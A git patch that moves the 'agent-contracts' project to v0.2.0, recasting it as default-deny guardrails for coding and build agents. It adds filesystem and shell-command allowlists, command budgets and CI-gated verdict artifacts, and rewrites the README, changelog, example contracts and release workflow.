From b4ccf97650f3f1279994a86c5eec81f051a479eb Mon Sep 17 00:00:00 2001 From: Piyush Vyas Date: Mon, 6 Apr 2026 15:43:31 -0500 Subject: [PATCH 1/4] =?UTF-8?q?feat:=20v0.2.0=20=E2=80=94=20repo-local=20c?= =?UTF-8?q?oding/build=20agent=20guardrails?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Repositions agent-contracts around fail-closed guardrails for autonomous coding/build agents in a repository: filesystem read/write scopes, shell command authorization, shell-command budgets, and a durable verdict artifact that CI can gate on. - filesystem read/write authorization scopes - shell command authorization scopes + max_shell_commands budget - verdict artifact emission and CLI verdict gating - coding-agent trace bootstrap improvements - demo contracts for blocked file writes, blocked commands, failed checks - canonical AGENT_CONTRACT.yaml repositioned as a repo-build agent - README, spec, and examples rewritten around the coding/build scope Co-Authored-By: Claude Opus 4.6 (1M context) --- .github/workflows/ci.yml | 6 + .github/workflows/publish.yml | 53 +- .gitignore | 5 + AGENT_CONTRACT.yaml | 231 +----- CHANGELOG.md | 51 +- CLAUDE.md | 69 -- README.md | 267 ++++--- action.yml | 60 +- .../2026-03-25-agent-contracts-v0.1-design.md | 361 ---------- .../2026-03-25-agent-contracts-v0.1-plan.md | 165 ----- examples/cost_controlled.yaml | 34 +- examples/demo_blocked_command.yaml | 29 + examples/demo_blocked_file_write.yaml | 24 + examples/demo_failed_checks.yaml | 15 + examples/repo_build_agent.yaml | 41 ++ examples/simple_chatbot.yaml | 7 +- examples/support_triage.yaml | 124 +--- pyproject.toml | 19 +- schemas/agent-contract.schema.json | 219 +++++- spec/SPECIFICATION.md | 329 ++++----- src/agent_contracts/__init__.py | 29 +- src/agent_contracts/_version.py | 2 +- src/agent_contracts/adapters/claude_agent.py | 2 +- src/agent_contracts/adapters/crewai.py | 2 +- src/agent_contracts/adapters/openai_agents.py | 2 +- src/agent_contracts/adapters/pydantic_ai.py | 2 +- src/agent_contracts/budgets.py | 42 +- src/agent_contracts/cli.py | 291 +++++--- src/agent_contracts/composition.py | 152 ++-- src/agent_contracts/effects.py | 150 ++-- src/agent_contracts/enforcer.py | 667 +++++++++++++----- src/agent_contracts/init_from_trace.py | 221 ++++-- src/agent_contracts/loader.py | 32 +- src/agent_contracts/postconditions.py | 152 ++-- .../schemas/agent-contract.schema.json | 219 +++++- src/agent_contracts/types.py | 22 + tests/conftest.py | 20 +- tests/test_budgets.py | 76 +- tests/test_cli.py | 99 +-- tests/test_composition.py | 2 +- tests/test_effects.py | 90 +-- tests/test_enforcer.py | 161 +++-- tests/test_init_from_trace.py | 61 +- tests/test_loader.py | 45 +- tests/test_postconditions.py | 42 +- 45 files changed, 2525 insertions(+), 2167 deletions(-) delete mode 100644 CLAUDE.md delete mode 100644 docs/plans/2026-03-25-agent-contracts-v0.1-design.md delete mode 100644 docs/plans/2026-03-25-agent-contracts-v0.1-plan.md create mode 100644 examples/demo_blocked_command.yaml create mode 100644 examples/demo_blocked_file_write.yaml create mode 100644 examples/demo_failed_checks.yaml create mode 100644 examples/repo_build_agent.yaml diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index 0968fd8..bc49da6 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -21,5 +21,11 @@ jobs: run: pip install -e ".[dev]" - name: Lint run: python -m ruff check src/ tests/ + - name: Type check + run: python -m mypy src/agent_contracts - name: Test run: python -m pytest --cov=agent_contracts --cov-report=term-missing + - name: Validate canonical contracts + run: | + python -m agent_contracts.cli validate AGENT_CONTRACT.yaml + python -m agent_contracts.cli validate examples/support_triage.yaml diff --git a/.github/workflows/publish.yml b/.github/workflows/publish.yml index 1864eb1..8be8892 100644 --- a/.github/workflows/publish.yml +++ b/.github/workflows/publish.yml @@ -1,15 +1,56 @@ -name: Publish to PyPI +name: Release on: - release: - types: [published] + push: + tags: + - "v*" permissions: + contents: write id-token: write +concurrency: ${{ github.workflow }}-${{ github.ref }} + jobs: + verify: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: Check repository hygiene + run: | + if git ls-files | rg -n '(^|/)(AGENTS\.md|CLAUDE\.md|docs/plans/|\.omx/|\.pilot/|\.dev-session/|\.staff-engineer-state\.json|\.staff-engineer\.json|ROADMAP\.md)$'; then + echo "Tracked internal-only files found in public release tree." + exit 1 + fi + - uses: actions/setup-python@v5 + with: + python-version: "3.12" + - name: Check tag version + run: | + TAG_VERSION="${GITHUB_REF_NAME#v}" + PKG_VERSION="$(python -c "from pathlib import Path; ns = {}; exec(Path('src/agent_contracts/_version.py').read_text(encoding='utf-8'), ns); print(ns['__version__'])")" + test "$TAG_VERSION" = "$PKG_VERSION" + - name: Install dependencies + run: python -m pip install -e ".[dev]" build twine + - name: Lint + run: python -m ruff check src/ tests/ + - name: Type check + run: python -m mypy src/agent_contracts + - name: Test + run: python -m pytest --cov=agent_contracts --cov-report=term-missing + - name: Validate canonical contracts + run: | + python -m agent_contracts.cli validate AGENT_CONTRACT.yaml + python -m agent_contracts.cli validate examples/support_triage.yaml + python -m agent_contracts.cli check-compat examples/support_triage.yaml examples/support_triage.yaml + - name: Build package + run: python -m build + - name: Check distributions + run: python -m twine check dist/* + publish: runs-on: ubuntu-latest + needs: verify environment: pypi steps: - uses: actions/checkout@v4 @@ -17,8 +58,12 @@ jobs: with: python-version: "3.12" - name: Install build tools - run: pip install build + run: python -m pip install build - name: Build package run: python -m build - name: Publish to PyPI uses: pypa/gh-action-pypi-publish@release/v1 + - name: Create GitHub Release + uses: softprops/action-gh-release@v2 + with: + generate_release_notes: true diff --git a/.gitignore b/.gitignore index 2a7211b..53932f6 100644 --- a/.gitignore +++ b/.gitignore @@ -18,6 +18,11 @@ htmlcov/ .coverage .coverage.* *.lcov +.omx/ +.pilot/ .dev-session/ .staff-engineer-state.json +AGENTS.md +CLAUDE.md +docs/plans/ ROADMAP.md diff --git a/AGENT_CONTRACT.yaml b/AGENT_CONTRACT.yaml index 7ba7fdd..c22fb6e 100644 --- a/AGENT_CONTRACT.yaml +++ b/AGENT_CONTRACT.yaml @@ -1,219 +1,54 @@ -# Tier 2 — Composable Contract (Full Reference Example) -# Supports multi-agent DAG composition, canary analysis, rollback, -# and regulatory audit trails. +# Canonical coding/build repo contract agent_contract: "0.1.0" identity: - name: support-triage-agent - version: "2.1.0" - description: > - Triages incoming support tickets by analyzing content, classifying - priority, and routing to the appropriate team. Handles 500+ tickets/day - with 99.5% contract satisfaction. - authors: - - Piyush Vyas + name: repo-build-agent + version: "0.1.0" + description: Fail-closed coding/build agent for this repository. contract: postconditions: - - name: produces_classification + - name: produces_output check: "output is not None" enforcement: sync_block severity: critical - description: Must always produce a triage result. + description: The run must produce a result object. - - name: valid_priority - check: 'output.priority in ["critical", "high", "medium", "low"]' + - name: repo_checks_green + check: "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0" enforcement: sync_block severity: critical - description: Priority must be one of the defined levels. - - - name: has_routing - check: 'output.routed_to is not None' - enforcement: sync_warn - severity: major - description: Should route to a team (warn if not). - slo: - target_rate: 0.99 - window: "24h" - - - name: response_quality - check: "eval:quality_judge" - enforcement: async_monitor - severity: minor - description: LLM-as-judge quality assessment (async, not blocking). - slo: - target_rate: 0.95 - window: "7d" - -inputs: - schema: - type: object - required: - - ticket_id - - subject - - body - properties: - ticket_id: - type: string - subject: - type: string - body: - type: string - customer_tier: - type: string - enum: ["enterprise", "business", "starter", "free"] - attachments: - type: array - items: - type: object - properties: - filename: - type: string - url: - type: string - - preconditions: - - name: ticket_not_empty - check: "len(input.body) > 0" - description: Ticket body must not be empty. - -outputs: - schema: - type: object - required: - - priority - - category - properties: - priority: - type: string - enum: ["critical", "high", "medium", "low"] - category: - type: string - routed_to: - type: string - summary: - type: string - suggested_response: - type: string - confidence: - type: number - minimum: 0 - maximum: 1 + description: Required repo checks must pass before the run is green. effects: authorized: - tools: - - ticket_database.read - - ticket_database.update_priority - - ticket_database.assign - - customer_lookup - - knowledge_base.search - - notification.send_team - network: - - "https://api.ticketing.internal/*" - - "https://api.customers.internal/*" - - "https://kb.internal/*" - state_writes: - - "tickets.*" - - declared: - tools: - - ticket_database.read - - ticket_database.update_priority - - ticket_database.assign - - customer_lookup - - knowledge_base.search - network: - - "https://api.ticketing.internal/v2/tickets" - - "https://api.customers.internal/v1/lookup" - - "https://kb.internal/search" - state_writes: - - "tickets.priority" - - "tickets.assignment" + filesystem: + read: + - "src/**" + - "tests/**" + - "README.md" + - "pyproject.toml" + write: + - "src/**" + - "tests/**" + - "README.md" + shell: + commands: + - "python -m pytest *" + - "python -m ruff check *" + - "python -m mypy *" + tools: [] + network: [] + state_writes: [] resources: budgets: - max_cost_usd: 0.10 - max_tokens: 8000 - max_tool_calls: 15 - max_duration_seconds: 20.0 - -failure_model: - errors: - - name: ticket_not_found - retryable: false - description: The referenced ticket does not exist. - - - name: database_timeout - retryable: true - max_retries: 3 - description: Ticket database took too long to respond. - - - name: rate_limit - retryable: true - max_retries: 2 - fallback: queue-agent - description: API rate limit exceeded, queue for later processing. - - - name: classification_uncertain - retryable: false - fallback: human-review-queue - description: Agent confidence too low for automated triage. - - default_timeout_seconds: 20.0 - - circuit_breaker: - failure_threshold: 10 - reset_timeout_seconds: 120.0 - -delegation: - max_depth: 2 - attenuate_effects: true - require_contract: true - allowed_agents: - - queue-agent - - human-review-queue - - notification-agent + max_cost_usd: 1.00 + max_tokens: 50000 + max_tool_calls: 20 + max_shell_commands: 10 + max_duration_seconds: 1800 observability: - traces: - enabled: true - sample_rate: 1.0 - - metrics: - - name: triage_latency_ms - type: histogram - description: End-to-end triage latency. - - name: triage_total - type: counter - description: Total tickets triaged. - - name: priority_distribution - type: gauge - description: Current distribution of ticket priorities. - - violation_events: - emit: true - destination: otel - -versioning: - build_id: "sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855" - breaking_changes: [] - substitution: - compatible_with: - - "2.0.0" - -slo: - contract_satisfaction_rate: - target: 0.995 - window: "24h" - - latency: - p50_ms: 800 - p99_ms: 5000 - - cost: - avg_usd: 0.04 - p99_usd: 0.10 - - error_budget_policy: freeze_deployments + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" diff --git a/CHANGELOG.md b/CHANGELOG.md index 2128a4c..5b314f8 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -1,47 +1,20 @@ # Changelog -All notable changes to this project will be documented in this file. +All notable changes to this project are tracked here. -The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/), -and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). - -## [0.1.1] - 2026-03-26 +## [0.2.0] - 2026-04-02 ### Added -- **OpenAI Agents SDK Adapter** — `ContractRunHooks(RunHooks)` for effect gating via `on_tool_start`, token tracking via `on_llm_end`, postcondition evaluation via `on_agent_end`. Pinned to `openai-agents==0.8.4` -- **Claude Agent SDK Adapter** — `ContractHooks` with structured deny via PreToolUse (not exception). Cost/token extraction from ResultMessage. Pinned to `claude-agent-sdk==0.1.50` (Python 3.10+) -- **Precondition Evaluation** — `contract.preconditions[]` evaluated on input BEFORE agent runs. Reuses CEL-like expression evaluator. `PreconditionError` blocks execution before tokens are spent. Wired into `ContractEnforcer.check_preconditions()` and `@enforce_contract` decorator -- **GitHub Action** — `pyyush/agentcontracts@v0.1.1` composite action for CI contract validation -- **README Badge** — PyPI version and CI status badges -- 35 new tests (188 total) - -## [0.1.0] - 2026-03-25 - -First release. YAML spec + Python SDK for production agent reliability. - -### Added +- repo-local coding/build-agent positioning across the README, spec, examples, and canonical contract +- filesystem read/write authorization scopes +- shell command authorization scopes +- shell-command budgets +- verdict artifact emission and CLI verdict gating +- coding-agent trace bootstrap improvements +- coding/build-focused demo contracts and CI action semantics -- **YAML Spec Schema** — JSON Schema (Draft 2020-12) covering 3 graduated tiers: - - Tier 0 (Standalone): identity + postconditions (4 fields to start) - - Tier 1 (Enforceable): + input/output schemas, effects authorization, budgets - - Tier 2 (Composable): + failure model, delegation, observability, SLOs -- **Contract Loading** — YAML parsing, schema validation, tier assessment, upgrade recommendations -- **Effect Authorization** — Default-deny tool gating with glob pattern matching. Effects split: `authorized` (intersection during delegation) vs `declared` (union for audit) -- **Budget Enforcement** — Thread-safe circuit breaker for cost, tokens, tool calls, and elapsed time. Raises `BudgetExceededError` when thresholds are hit -- **Postcondition Evaluator** — Safe CEL-like expression evaluator (no `eval()`). Supports `is None`, comparisons, membership tests, `len()`. Three enforcement timings: `sync_block`, `sync_warn`, `async_monitor` -- **Violation Events** — OTel-compatible structured events with contract_id, violated_clause, evidence, severity, and trace context. Emits to stdout, OpenTelemetry SDK, or callback -- **Runtime Enforcer** — Unified middleware wiring effects, budgets, postconditions, and violations. Works as decorator (`@enforce_contract`), context manager, or explicit API -- **Composition Checker** — Contract Differential analysis: schema gaps, capability gaps, budget gaps, effect violations between producer/consumer contracts -- **CLI** — Four commands: - - `aicontracts validate` — schema validation + tier + recommendations - - `aicontracts check-compat` — composition compatibility check - - `aicontracts init --from-trace` — generate contract skeleton from JSONL traces - - `aicontracts test --eval-suite` — run eval suite against postconditions -- **Framework Adapters** — LangChain (`ContractCallbackHandler`), CrewAI (`ContractGuard`), Pydantic AI (`ContractMiddleware`). Each under 200 lines, 3-line integration -- **MCP Extension Proposal** — `x-agent-contract` for tool-level preconditions, effect declarations, and trust metadata -- **Specification** — Human-readable spec narrative (`SPECIFICATION.md`) -- **Examples** — Reference contracts for all 3 tiers +### Changed -[0.1.1]: https://github.com/pyyush/agentcontracts/releases/tag/v0.1.1 -[0.1.0]: https://github.com/pyyush/agentcontracts/releases/tag/v0.1.0 +- promoted the coding/build-agent guardrail work into the v0.2.0 release line +- clarified Claude/Codex/OpenAI integration limits around hard stops vs final CI gating diff --git a/CLAUDE.md b/CLAUDE.md deleted file mode 100644 index 5874091..0000000 --- a/CLAUDE.md +++ /dev/null @@ -1,69 +0,0 @@ -# Agent Contracts - -## What This Is - -YAML spec + Python SDK for production agent reliability. Enforces cost control, tool-use security, and audit trails at the runtime boundary. - -## Structure - -``` -schemas/agent-contract.schema.json JSON Schema (all 3 tiers) -spec/SPECIFICATION.md Human-readable spec narrative -mcp/x-agent-contract.md MCP extension proposal -src/agent_contracts/ - __init__.py Public API surface - types.py Frozen dataclasses (Contract, etc.) - schema.py JSON Schema loading + validation - loader.py YAML loading → Contract objects - tier.py Tier assessment (0/1/2) + recommendations - effects.py Default-deny effect gating (glob patterns) - budgets.py Thread-safe budget tracker + circuit breaker - postconditions.py Safe expression evaluator (no eval()) - violations.py OTel-compatible violation events - enforcer.py Unified enforcement middleware - composition.py Contract Differential checker - cli.py CLI (validate, check-compat, init, test) - init_from_trace.py Generate contracts from JSONL traces - adapters/ - langchain.py LangChain CallbackHandler - crewai.py CrewAI ContractGuard - pydantic_ai.py Pydantic AI ContractMiddleware - openai_agents.py OpenAI Agents SDK RunHooks - claude_agent.py Claude Agent SDK ContractHooks -examples/ Reference contracts (Tier 0, 1, 2) -tests/ pytest test suite -``` - -## Conventions - -- **Python 3.9+** — uses `from __future__ import annotations` for modern syntax -- **Type-safe** — full type annotations, `frozen=True` dataclasses, `py.typed` marker -- **No eval()** — CEL-like expressions parsed by safe evaluator -- **Default-deny** — effects.authorized is an allowlist; unlisted = blocked -- **Thread-safe** — budget counters use `threading.Lock` -- **Minimal deps** — core requires only pyyaml, jsonschema, click -- **Framework adapters** — optional extras, <200 LOC each - -## Testing - -```bash -pip install -e ".[dev]" -pytest # Run all tests -pytest -v # Verbose -pytest --cov # With coverage -``` - -## Key Commands - -```bash -aicontracts validate contract.yaml -aicontracts check-compat a.yaml b.yaml -aicontracts init --from-trace traces.jsonl -aicontracts test contract.yaml --eval-suite evals/ -``` - -## Version - -- Current: 0.1.0 -- License: Apache-2.0 -- Author: Piyush Vyas diff --git a/README.md b/README.md index ec2c73c..42069a1 100644 --- a/README.md +++ b/README.md @@ -1,38 +1,42 @@ # Agent Contracts -[![PyPI](https://img.shields.io/pypi/v/aicontracts)](https://pypi.org/project/aicontracts/) [![CI](https://github.com/pyyush/agentcontracts/actions/workflows/ci.yml/badge.svg)](https://github.com/pyyush/agentcontracts/actions/workflows/ci.yml) -**YAML spec + validation SDK for production agent reliability.** +**Repo-local, fail-closed guardrails for autonomous coding/build agents.** -Cost control, tool-use security, and audit trails in under 30 minutes of integration. Works with any framework. Enforces at the runtime layer, not via prompts. +`agent-contracts` lets a repository declare what an agent may read, write, run, call, and spend — and then emit one durable verdict artifact showing whether the run passed, warned, blocked, or failed. -``` +```bash pip install aicontracts ``` -## The Problem +## What it solves + +Without a repo-local contract, coding agents usually run with ambient authority. +That creates five common failure modes: -Production agents fail at 41-87% rates. 97% of enterprises with agents in production haven't figured out how to scale them. The four pain points: +- edits outside the intended file scope +- forbidden shell commands +- unauthorized tool or network calls +- silent budget overruns +- fake green runs when repo checks are red -| Problem | Without Contracts | With Contracts | -|---------|------------------|----------------| -| **Cost runaway** | No ceiling on token spend | Budget circuit breaker per invocation | -| **Unauthorized tool use** | Ambient authority, prompt-bypassable | Default-deny allowlist at SDK layer | -| **No audit trail** | No record of authorized vs. actual | OTel-compatible violation events | -| **Silent regressions** | Prompt changes break things invisibly | Versioned contracts with SLO monitoring | +Agent Contracts keeps the scope narrow: -## 5-Minute Quick Start +> declare the repo-local contract, enforce it at runtime and in CI, and fail closed with a verdict artifact. -### 1. Write a Contract (or generate one) +## 5-minute quick start + +### 1. Write a coding-agent contract ```yaml # AGENT_CONTRACT.yaml agent_contract: "0.1.0" identity: - name: my-agent - version: "1.0.0" + name: repo-build-agent + version: "0.1.0" + description: Safe coding/build agent for this repository. contract: postconditions: @@ -41,144 +45,185 @@ contract: enforcement: sync_block severity: critical + - name: repo_checks_green + check: "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0" + enforcement: sync_block + severity: critical + effects: authorized: - tools: [search, database.read] - network: ["https://api.example.com/*"] + filesystem: + read: ["src/**", "tests/**", "README.md", "pyproject.toml"] + write: ["src/**", "tests/**", "README.md"] + shell: + commands: + - "python -m pytest *" + - "python -m ruff check *" + tools: [] + network: [] + state_writes: [] resources: budgets: - max_cost_usd: 0.50 - max_tokens: 10000 + max_tokens: 50000 max_tool_calls: 20 -``` - -Or generate from observed behavior: + max_shell_commands: 10 + max_duration_seconds: 1800 -```bash -aicontracts init --from-trace traces.jsonl -o AGENT_CONTRACT.yaml +observability: + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" ``` -### 2. Enforce at Runtime +### 2. Enforce it in the agent runtime ```python -from agent_contracts import load_contract, ContractEnforcer +from agent_contracts import ContractEnforcer, load_contract contract = load_contract("AGENT_CONTRACT.yaml") -with ContractEnforcer(contract) as enforcer: - # Each tool call is checked against the allowlist and budget - enforcer.check_tool_call("search") # OK - in allowlist - enforcer.check_tool_call("delete_all") # BLOCKED - not authorized - - enforcer.add_cost(0.05) # Tracked against max_cost_usd - enforcer.add_tokens(500) # Tracked against max_tokens +with ContractEnforcer(contract, host_name="codex") as enforcer: + enforcer.check_file_read("src/app.py") + enforcer.check_file_write("src/app.py") + enforcer.check_shell_command("python -m pytest tests/test_app.py") - # Postconditions evaluated after execution - enforcer.evaluate_postconditions(result) -``` + result = {"status": "done"} -### 3. Framework Integration (3 lines) + enforcer.record_check("pytest", "pass", exit_code=0) + enforcer.record_check("ruff", "pass", exit_code=0) + verdict = enforcer.finalize_run(output=result) -**LangChain:** -```python -from agent_contracts.adapters.langchain import ContractCallbackHandler -handler = ContractCallbackHandler.from_file("AGENT_CONTRACT.yaml") -agent.invoke({"input": query}, config={"callbacks": [handler]}) +print(verdict.outcome) # pass | warn | blocked | fail +print(verdict.artifacts) # includes verdict artifact path ``` -**CrewAI:** -```python -from agent_contracts.adapters.crewai import ContractGuard -guard = ContractGuard.from_file("AGENT_CONTRACT.yaml") -result = guard.execute(crew, inputs={"query": query}) -``` - -**Pydantic AI:** -```python -from agent_contracts.adapters.pydantic_ai import ContractMiddleware -middleware = ContractMiddleware.from_file("AGENT_CONTRACT.yaml") -result = await middleware.run(agent, prompt) -``` +### 3. Gate the verdict in CI -**OpenAI Agents SDK:** -```python -from agent_contracts.adapters.openai_agents import ContractRunHooks -hooks = ContractRunHooks.from_file("AGENT_CONTRACT.yaml") -result = await Runner.run(agent, "prompt", run_hooks=[hooks]) +```bash +python -m agent_contracts.cli validate AGENT_CONTRACT.yaml +python -m agent_contracts.cli check-verdict .agent-contracts/runs//verdict.json ``` -**Claude Agent SDK:** -```python -from agent_contracts.adapters.claude_agent import ContractHooks -hooks = ContractHooks.from_file("AGENT_CONTRACT.yaml") -# Pass hooks.pre_tool_use to ClaudeAgentOptions +## Verdict artifacts + +Every meaningful run can emit one compact artifact, for example: + +```json +{ + "run_id": "...", + "outcome": "pass", + "final_gate": "allowed", + "checks": [ + {"name": "pytest", "status": "pass", "exit_code": 0}, + {"name": "ruff", "status": "pass", "exit_code": 0} + ], + "budgets": { + "tokens": 12345, + "tool_calls": 0, + "shell_commands": 2, + "duration_seconds": 18.2 + }, + "violations": [] +} ``` -## Three Tiers +Outcome semantics: -Start simple, add guarantees as production demands. - -| Tier | Fields | Value | -|------|--------|-------| -| **0: Standalone** | identity + 1 postcondition (4 fields) | Self-documentation, local validation | -| **1: Enforceable** | + schemas, effects, budgets | Cost control, tool gating, I/O validation | -| **2: Composable** | + failure model, delegation, observability, SLOs | Multi-agent composition, audit trails, canary gates | +- `pass` — required checks and blocking clauses passed +- `warn` — allowed to proceed, but warnings were recorded +- `blocked` — an operation was denied during the run +- `fail` — the run completed, but required checks or critical postconditions failed ## CLI ```bash -# Validate a contract -aicontracts validate AGENT_CONTRACT.yaml +# Validate a contract and show coding/build surfaces +python -m agent_contracts.cli validate AGENT_CONTRACT.yaml # Check composition compatibility -aicontracts check-compat producer.yaml consumer.yaml +python -m agent_contracts.cli check-compat producer.yaml consumer.yaml + +# Bootstrap from traces +python -m agent_contracts.cli init --from-trace traces.jsonl -o AGENT_CONTRACT.yaml -# Generate from execution traces -aicontracts init --from-trace traces.jsonl +# Generate a coding-agent starter template +python -m agent_contracts.cli init --template coding -# Run eval suite against postconditions -aicontracts test AGENT_CONTRACT.yaml --eval-suite tests/ +# Gate a verdict artifact in CI +python -m agent_contracts.cli check-verdict .agent-contracts/runs//verdict.json ``` -## Key Design Decisions +## Host integrations -1. **Spec + SDK, not protocol or platform** — the OpenAPI model -2. **YAML primary** — JSON Schema validation, CEL-like inline expressions -3. **Graduated tiers** — Tier 0 is 4 fields, not 40 -4. **Effects: authorized vs. declared** — intersection for delegation, union for audit -5. **Enforcement at SDK layer** — never in prompts (prompt injection can't bypass) -6. **MCP extension, not fork** — `x-agent-contract` on tool definitions +### Claude Code / Claude SDK -## Positioning +Claude is the strongest local hard-stop path in this repo today because it can deny tool use before execution through hooks. Use the repo contract as the source of truth, and map the contract's allowlists into Claude's hook surface where possible. -MCP governs how agents connect. Agent Skills govern what agents advertise. -A2A governs how agents find each other. **Agent Contracts govern what agents -must do, must not do, and what happens when they fail.** +### Codex -## Project Structure +Codex can use the same repo-local contract for enforcement in wrappers and for final CI gating via verdict artifacts. The contract file stays in the repo; CI becomes the final source of truth for merge readiness. +### OpenAI Agents SDK + +The OpenAI adapter can block tool execution at `on_tool_start`, but cannot recover reasoning tokens already spent deciding to call the tool. The docs and adapter are explicit about that limit. + +## GitHub Action + +```yaml +- uses: pyyush/agentcontracts@v0.2.0 + with: + contract: AGENT_CONTRACT.yaml + verdict: .agent-contracts/runs/${{ github.run_id }}/verdict.json ``` -schemas/ JSON Schema for AGENT_CONTRACT.yaml -spec/SPECIFICATION.md Human-readable spec narrative -mcp/x-agent-contract.md MCP extension proposal -src/agent_contracts/ Python SDK - loader.py Contract loading + validation - enforcer.py Runtime enforcement middleware - effects.py Default-deny effect gating - budgets.py Budget tracking + circuit breaker - postconditions.py Postcondition evaluation - violations.py OTel-compatible violation events - composition.py Contract Differential checker - cli.py CLI tool - adapters/ Framework adapters -examples/ Reference contracts (Tier 0, 1, 2) + +The action validates contracts and, when a verdict path is provided, fails the workflow for `blocked` or `fail` outcomes. + +## Canonical examples + +- `AGENT_CONTRACT.yaml` — canonical repo-build agent contract +- `examples/repo_build_agent.yaml` — reference coding/build repo contract +- `examples/demo_blocked_file_write.yaml` — protected-file demo +- `examples/demo_blocked_command.yaml` — forbidden-command demo +- `examples/demo_failed_checks.yaml` — red-checks demo +- `examples/support_triage.yaml` — broader tier-2 example retained for composition docs + +## Project structure + +```text +schemas/ JSON Schema for AGENT_CONTRACT.yaml +spec/SPECIFICATION.md Human-readable specification +src/agent_contracts/ Python SDK + cli.py CLI entry point + loader.py YAML loading + validation + types.py Dataclasses / type model + effects.py Tool, filesystem, network, and shell authorization + budgets.py Budget tracking + postconditions.py Postcondition evaluation + enforcer.py Runtime enforcement + verdict artifacts + init_from_trace.py Bootstrap from traces + adapters/ Host/framework integrations +examples/ Reference contracts and demos +action.yml GitHub composite action +AGENT_CONTRACT.yaml Canonical coding-agent contract ``` -## License +## Scope and non-goals -Apache-2.0 +This repo is intentionally narrow. + +In scope: + +- repo-local contracts for coding/build agents +- file, shell, tool, network, and budget boundaries +- runtime + CI gating +- durable verdict artifacts -## Author +Out of scope for the current release: -Piyush Vyas +- hosted control planes +- compliance dashboards +- generic agent governance positioning +- speculative multi-agent infrastructure + +## License + +Apache-2.0 diff --git a/action.yml b/action.yml index b4b1c1c..4e163cb 100644 --- a/action.yml +++ b/action.yml @@ -1,5 +1,5 @@ -name: 'AI Contracts Validate' -description: 'Validate agent contracts against the AI Contracts spec' +name: 'Agent Contracts Gate' +description: 'Validate repo-local agent contracts and optionally gate a run verdict artifact' branding: icon: 'shield' color: 'blue' @@ -8,8 +8,16 @@ inputs: contract: description: 'Path to contract YAML file(s), space-separated' required: true + verdict: + description: 'Optional verdict artifact path to gate' + required: false + default: '' fail-on-warning: - description: 'Fail if contract has upgrade recommendations' + description: 'Fail if contract validation returns upgrade recommendations' + required: false + default: 'false' + fail-on-warn-outcome: + description: 'Fail if the verdict outcome is warn' required: false default: 'false' python-version: @@ -20,10 +28,13 @@ inputs: outputs: outcome: description: 'pass or fail' - value: ${{ steps.validate.outputs.outcome }} + value: ${{ steps.gate.outputs.outcome }} tier: description: 'Contract tier (0, 1, or 2)' - value: ${{ steps.validate.outputs.tier }} + value: ${{ steps.gate.outputs.tier }} + verdict-outcome: + description: 'Verdict outcome when a verdict artifact is provided' + value: ${{ steps.gate.outputs.verdict_outcome }} runs: using: 'composite' @@ -34,25 +45,46 @@ runs: - name: Install aicontracts shell: bash - run: pip install aicontracts + run: python -m pip install aicontracts==0.2.0 - - name: Validate contracts - id: validate + - name: Validate contract and verdict + id: gate shell: bash run: | + set -euo pipefail outcome="pass" + tier="" + verdict_outcome="" + for contract in ${{ inputs.contract }}; do echo "::group::Validating $contract" - result=$(aicontracts validate "$contract" -j) - if [ $? -eq 0 ]; then - tier=$(echo "$result" | python3 -c "import sys,json; print(json.load(sys.stdin)['tier'])") - echo "tier=$tier" >> "$GITHUB_OUTPUT" - else + result=$(python -m agent_contracts.cli validate "$contract" --json-output) + tier=$(echo "$result" | python -c 'import json,sys; data=json.load(sys.stdin); print(data["tier"])') + recommendations=$(echo "$result" | python -c 'import json,sys; data=json.load(sys.stdin); print(len(data["recommendations"]))') + echo "$result" + echo "::endgroup::" + if [ "${{ inputs.fail-on-warning }}" = "true" ] && [ "$recommendations" -gt 0 ]; then outcome="fail" fi - echo "::endgroup::" done + + if [ -n "${{ inputs.verdict }}" ]; then + echo "::group::Checking verdict ${{ inputs.verdict }}" + extra_flag="" + if [ "${{ inputs.fail-on-warn-outcome }}" = "true" ]; then + extra_flag="--fail-on-warn" + fi + if ! python -m agent_contracts.cli check-verdict "${{ inputs.verdict }}" $extra_flag; then + outcome="fail" + fi + verdict_outcome=$(python -c 'import json,sys; print(json.load(open(sys.argv[1], encoding="utf-8"))["outcome"])' "${{ inputs.verdict }}") + echo "::endgroup::" + fi + + echo "tier=$tier" >> "$GITHUB_OUTPUT" echo "outcome=$outcome" >> "$GITHUB_OUTPUT" + echo "verdict_outcome=$verdict_outcome" >> "$GITHUB_OUTPUT" + if [ "$outcome" = "fail" ]; then exit 1 fi diff --git a/docs/plans/2026-03-25-agent-contracts-v0.1-design.md b/docs/plans/2026-03-25-agent-contracts-v0.1-design.md deleted file mode 100644 index fb3af96..0000000 --- a/docs/plans/2026-03-25-agent-contracts-v0.1-design.md +++ /dev/null @@ -1,361 +0,0 @@ -# Agent Contracts v0.1 — Design Document - -## Metadata -- **Status:** Draft -- **Author:** Piyush Vyas -- **Date:** 2026-03-25 -- **Reviewers:** Claude quality-reviewer, Codex cross-reviewer -- **Complexity Tier:** Complex - ---- - -## Context & Problem Statement - -Production AI agents fail at 41–86.7% rates (MAST taxonomy, 1,642 traces across 7 frameworks). -97% of enterprises with agents in production cannot scale them. The dominant failure modes — -cost runaway, unauthorized tool use, missing audit trails, silent regressions — have no -framework-agnostic solution. - -MCP owns transport. LangChain/CrewAI own orchestration. Datadog/Langfuse own observability. -**No layer governs what an agent may do, must guarantee, and what happens when it fails.** - -Agent Contracts fills this gap: a YAML spec + validation SDK that enforces agent behavior -at the runtime boundary. The OpenAPI model — a machine-readable document that generates -tooling leverage. - -**Why now:** EU AI Act high-risk requirements take effect Aug 2026. HIPAA Security Rule update -makes AI handling ePHI subject to mandatory controls. The standards window closes in 12–18 months. - ---- - -## Goals - -1. **Define a YAML spec** (AGENT_CONTRACT.yaml) with 3 graduated tiers (Standalone → Enforceable → Composable) -2. **Ship a Python SDK** (`agent-contracts`) that validates contracts, enforces 